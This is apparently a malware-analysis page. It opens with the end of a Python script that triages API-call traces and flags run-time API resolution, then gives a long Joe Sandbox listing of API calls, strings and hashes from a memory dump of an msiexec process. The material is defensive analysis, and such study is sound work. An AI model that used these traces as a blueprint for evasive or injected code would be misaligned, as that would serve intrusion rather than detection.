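    return Counter(c["module"] for c in calls)


def dynamic_api_resolution(calls):
    """Heuristic (assumption, not Joe Sandbox's rule): a LoadLibrary* call, in the
    function itself or in one of its subcalls, followed in trace order by
    GetProcAddress means exports are resolved at run time rather than imported.
    Returns the GetProcAddress call sites, or [] when the pattern is absent."""
    load_idx = next((i for i, c in enumerate(calls)
                     if c["func"].startswith("LoadLibrary")), None)
    if load_idx is None:
        return []
    return [c["ref"] for c in calls[load_idx + 1:] if c["func"] == "GetProcAddress"]


def triage(text):
    """One-line summary of a function's trace for quick comparison between entries."""
    calls = parse_api_trace(text)
    return {
        "calls": len(calls),
        "direct": sum(1 for c in calls if c["subcall"] is None),
        "modules": dict(module_histogram(calls)),
        "getprocaddress_sites": [f"{r:08X}" for r in dynamic_api_resolution(calls)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

The parser is deliberately strict about the layout seen on this page: lines such as `memset.MSVCRT ref: 0040A824` carry no argument list, while `GetProcAddress.KERNEL32(?,00000000), ref: 00404398` does, so the argument group and the comma before `ref:` are both optional. The GetProcAddress name arguments are all `00000000` here, so the trace alone does not say which advapi32 exports are resolved; that has to come from the dump.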
APIs
Strings
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <%s>, xrefs: 004100A6
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
APIs
• strlen.MSVCRT ref: 00408DFA
  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
• memset.MSVCRT ref: 00408E46
• memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
• memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
• memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
• memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memsetstrlen
• String ID:
• API String ID: 2350177629-0
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
                                                                                                    • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                    • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 313946961-1552265934
                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                    • API String ID: 0-1953309616
                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                    • API String ID: 3510742995-272990098
                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1265369119-0
                                                                                                    • Opcode ID: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                    • Opcode Fuzzy Hash: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: e158b21779275c2f16096f6bceaa7d57dd351cf6c867271926deb1a7a225879b
                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                    • Opcode Fuzzy Hash: e158b21779275c2f16096f6bceaa7d57dd351cf6c867271926deb1a7a225879b
                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4053608372-0
                                                                                                    • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                    • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
